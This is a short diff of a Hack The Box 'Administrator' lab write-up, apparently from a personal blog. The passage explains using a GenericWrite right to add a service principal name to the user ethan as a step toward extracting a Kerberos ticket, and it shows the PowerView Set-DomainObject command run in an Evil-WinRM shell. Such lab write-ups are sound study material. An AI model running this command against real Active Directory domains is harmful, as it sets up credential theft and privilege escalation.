BinaryExecutioner/BinaryExecutioner.github.io/_posts/2024-11-24-HTB_Administrator.md

 Since emily has "GenericWrite" privileges on ethan, adding "serviceprincipalname" to the user "ethan".
 Making ethan as service account.

-With the GenericWrite privilege, I added a serviceprincipalname attribute to Ethanâ€™s account, making it act as a service account.
+With the GenericWrite privilege, I added a serviceprincipalname attribute to Ethan€™s account, making it act as a service account.
 This change sets the stage for extracting a Kerberos TGS (Ticket-Granting Service).

 ```bash
 *Evil-WinRM* PS C:\Users\emily> Set-DomainObject -Identity ethan -Set @{serviceprincipalname='administrator/vegito'} -verbose